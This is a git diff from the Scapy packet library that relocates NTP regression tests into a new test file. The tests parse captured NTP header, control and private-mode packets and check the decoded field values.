1) -assert(bytes_hex(p.authenticator.dgst) == b'6224b8494d2ea631d085498fa7278992') - - -= NTP Private (mode 7) - REQ_ADD_TRAP (2) - response -s = b'\x97\x00\x03\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 30) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_CLR_TRAP (1) - request -s = b'\x17\x80\x03\x1f\x00\x01\x000\x00\x00\x00\x00\xc0\x00\x02\x03H\x0f\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xedb\xb3\x18\x1c\x00\x00\x00\x00\x01\xa5_V\x9e\xb8qD\x92\x1b\x1c>Z\xad]*\x89' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 31) -assert(p.err == 0) -assert(p.nb_items == 1) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfTrap)) -assert(p.req_data[0].trap_address == '192.0.2.3') -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'a55f569eb87144921b1c3e5aad5d2a89') - - -= NTP Private (mode 7) - REQ_CLR_TRAP (2) - response -s = b'\x97\x00\x03\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 31) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_GET_CTLSTATS - response -s = b'\x97\x00\x03"\x00\x01\x00<\x00\x00\x00\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 34) -assert(p.nb_items == 1) -assert(p.data_item_size == 60) -assert(type(p.data[0]) == NTPInfoControl) -assert(p.data[0].ctltimereset == 237) - - -= NTP Private (mode 7) - REQ_GET_KERNEL (1) - request -s = b'\x17\x00\x03&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 38) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_GET_KERNEL (2) - response -s = b'\x97\x00\x03&\x00\x01\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf4$\x00\x00\xf4$\x00 A\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 38) -assert(p.nb_items == 1) -assert(p.data_item_size == 60) -assert(isinstance(p.data[0], NTPInfoKernel)) -assert(p.data[0].maxerror == 16000000) -assert(p.data[0].esterror == 16000000) -assert(p.data[0].status == 8257) -assert(p.data[0].constant == 3) -assert(p.data[0].precision == 1) -assert(p.data[0].tolerance == 32768000) - - - -= NTP Private (mode 7) - REQ_MON_GETLIST_1 (1) - request -s = b'\x17\x00\x03*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 42) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_MON_GETLIST_1 (2) - response -s = b'\xd7\x00\x03*\x00\x06\x00H\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\x94mw\xe9\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\x13\xb6\xa9J\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xbb]\x81\xea\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xfc\xbf\xd5a\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xbe\x10x\xa8\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xde[ng\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 42) -assert(p.nb_items == 6) -assert(p.data_item_size == 72) - - -= NTP Private (mode 7) - REQ_IF_STATS (1) - request -s = b'\x17\x80\x03,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xeb\xdd\x8cH\xefe\x00\x00\x00\x01\x8b\xfb\x90u\xa8ad\xe8\x87\xca\xbf\x96\xd2\x9d\xddI' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 44) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'8bfb9075a86164e887cabf96d29ddd49') - - -= NTP Private (mode 7) - REQ_IF_STATS (2) - response -s = b"\xd7\x00\x03,\x00\x03\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x01lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\n\x00'\xff\xfe\xe3\x81r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\n\x00'\xff\xfe\xa0\x1d\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00" -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 44) -assert(p.err == 0) -assert(p.nb_items == 3) -assert(p.data_item_size == 136) -assert(isinstance(p.data[0], NTPInfoIfStatsIPv6)) -assert(p.data[0].unaddr == "::1") -assert(p.data[0].unmask == "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff") -assert(p.data[0].ifname.startswith(b"lo")) - - -= NTP Private (mode 7) - REQ_IF_STATS (3) - response -s = b'\xd7\x01\x03,\x00\x03\x00\x88\xc0\xa8ze\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8z\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x00\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 44) -assert(p.err == 0) -assert(p.nb_items == 3) -assert(p.data_item_size == 136) -assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) -assert(p.data[0].unaddr == "192.168.122.101") -assert(p.data[0].unmask == "255.255.255.0") -assert(p.data[0].ifname.startswith(b"eth1")) - - -= NTP Private (mode 7) - REQ_IF_RELOAD (1) - request -s = b'\x17\x80\x03-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xed\xa3\xdc\x7f\xc6\x11\x00\x00\x00\x01\xfb>\x96*\xe7O\xf7\x8feh\xd4\x07L\xc0\x08\xcb' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 45) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'fb3e962ae74ff78f6568d4074cc008cb') - - -= NTP Private (mode 7) - REQ_IF_RELOAD (2) - response -s = b'\xd7\x00\x03-\x00\x03\x00\x88\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x02\x00\x01\x00\x00\x00\x00\xc0\xa8ze\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8z\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x02\x00\x01\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 45) -assert(p.err == 0) -assert(p.nb_items == 3) -assert(p.data_item_size == 136) -assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) -assert(p.data[0].unaddr == "127.0.0.1") -assert(p.data[0].unmask == "255.0.0.0") -assert(p.data[0].ifname.startswith(b"lo")) - - ############ ############ ############ diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts new file mode 100644 index 00000000000..6d9d3ffd91a --- /dev/null +++ b/test/scapy/layers/ntp.uts @@ -0,0 +1,1093 @@ +% NTP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +############ ++ Basic tests + += specific haslayer and getlayer implementations for NTP +~ haslayer getlayer NTP +pkt = IP() / UDP() / NTPHeader() +assert NTP in pkt +assert pkt.haslayer(NTP) +assert isinstance(pkt[NTP], NTPHeader) +assert isinstance(pkt.getlayer(NTP), NTPHeader) + +############ +############ ++ NTP module tests + += NTP - Layers (1) +p = NTPHeader() +assert(NTPHeader in p) +assert(not NTPControl in p) +assert(not NTPPrivate in p) +assert(NTP in p) +p = NTPControl() +assert(not NTPHeader in p) +assert(NTPControl in p) +assert(not NTPPrivate in p) +assert(NTP in p) +p = NTPPrivate() +assert(not NTPHeader in p) +assert(not NTPControl in p) +assert(NTPPrivate in p) +assert(NTP in p) + += NTP - Layers (2) +p = NTPHeader() +assert(type(p[NTP]) == NTPHeader) +p = NTPControl() +assert(type(p[NTP]) == NTPControl) +p = NTPPrivate() +assert(type(p[NTP]) == NTPPrivate) + += NTP - sessions (1) +p = IP()/TCP()/NTP() +l = PacketList(p) +s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e +assert len(s) == 1 + += NTP - sessions (2) +p = IP()/UDP()/NTP() +l = PacketList(p) +s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e +assert len(s) == 1 + +############ +############ ++ NTPHeader tests + += NTPHeader - Basic checks +len(raw(NTP())) == 48 + + += NTPHeader - Dissection +s = b"!\x0b\x06\xea\x00\x00\x00\x00\x00\x00\xf2\xc1\x7f\x7f\x01\x00\xdb9\xe8\xa21\x02\xe6\xbc\xdb9\xe8\x81\x02U8\xef\xdb9\xe8\x80\xdcl+\x06\xdb9\xe8\xa91\xcbI\xbf\x00\x00\x00\x01\xady\xf3\xa1\xe5\xfc\xd02\xd2j\x1e'\xc3\xc1\xb6\x0e" +p = NTP(s) +assert(isinstance(p, NTPHeader)) +assert(p[NTPAuthenticator].key_id == 1) +assert(bytes_hex(p[NTPAuthenticator].dgst) == b'ad79f3a1e5fcd032d26a1e27c3c1b60e') + + += NTPHeader - KoD +s = b'\xe4\x00\x06\xe8\x00\x00\x00\x00\x00\x00\x02\xcaINIT\x00\x00\x00\x00\x00\x00\x00\x00\xdb@\xe3\x9eH\xa3pj\xdb@\xe3\x9eH\xf0\xc3\\\xdb@\xe3\x9eH\xfaL\xac\x00\x00\x00\x01B\x86)\xc1Q4\x8bW8\xe7Q\xda\xd0Z\xbc\xb8' +p = NTP(s) +assert(isinstance(p, NTPHeader)) +assert(p.leap == 3) +assert(p.version == 4) +assert(p.mode == 4) +assert(p.stratum == 0) +assert(p.ref_id == b'INIT') + + += NTPHeader - Extension dissection test +s = b'#\x02\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xdbM\xdf\x19e\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdbM\xdf\x19e\x89\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPHeader)) +assert(p.leap == 0) +assert(p.version == 4) +assert(p.mode == 3) +assert(p.stratum == 2) + += NTPAuthenticator + +s = hex_bytes("000c2962f268d094666d23750800450000640db640004011a519c0a80364c0a80305a51e007b0050731a2300072000000000000000000000000000000000000000000000000000000000000000000000000052c7bc1dda64b97d0000000bcdc3825dbf6b7ad02886ff45aa8b2eaf7ac78bc1") +p = Ether(s) +assert NTPAuthenticator in p and p[NTPAuthenticator].key_id == 3452142173 + + +############ +############ ++ NTP Control (mode 6) tests + += NTP Control (mode 6) - CTL_OP_READSTAT (1) - request +s = b'\x16\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 1) +assert(p.sequence == 12) +assert(p.status == 0) +assert(p.association_id == 0) +assert(p.offset == 0) +assert(p.count == 0) +assert(p.data == b'') + + += NTP Control (mode 6) - CTL_OP_READSTAT (2) - response +s = b'\x16\x81\x00\x0c\x06d\x00\x00\x00\x00\x00\x04\xe5\xfc\xf6$' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 1) +assert(p.err == 0) +assert(p.more == 0) +assert(p.op_code == 1) +assert(p.sequence == 12) +assert(isinstance(p.status_word, NTPSystemStatusPacket)) +assert(p.status_word.leap_indicator == 0) +assert(p.status_word.clock_source == 6) +assert(p.status_word.system_event_counter == 6) +assert(p.status_word.system_event_code == 4) +assert(p.association_id == 0) +assert(p.offset == 0) +assert(p.count == 4) +assert(isinstance(p.data, NTPPeerStatusDataPacket)) +assert(p.data.association_id == 58876) +assert(isinstance(p.data.peer_status, NTPPeerStatusPacket)) +assert(p.data.peer_status.configured == 1) +assert(p.data.peer_status.auth_enabled == 1) +assert(p.data.peer_status.authentic == 1) +assert(p.data.peer_status.reachability == 1) +assert(p.data.peer_status.reserved == 0) +assert(p.data.peer_status.peer_sel == 6) +assert(p.data.peer_status.peer_event_counter == 2) +assert(p.data.peer_status.peer_event_code == 4) + + += NTP Control (mode 6) - CTL_OP_READVAR (1) - request +s = b'\x16\x02\x00\x12\x00\x00\xfc\x8f\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPControl)) +assert(p.version == 2) +assert(p.mode == 6) +assert(p.response == 0) +assert(p.op_code == 2) +assert(p.sequence == 18) +assert(p.status == 0) +assert(p.association_id == 64655) +assert(p.data == b'') + + += NTP Control (mode 6) - CTL_OP_READVAR (2) - response (1st packet) +s = b'\xd6\xa2\x00\x12\xc0\x11\xfc\x8f\x00\x00\x01\xd4srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ' +p = NTP(s) 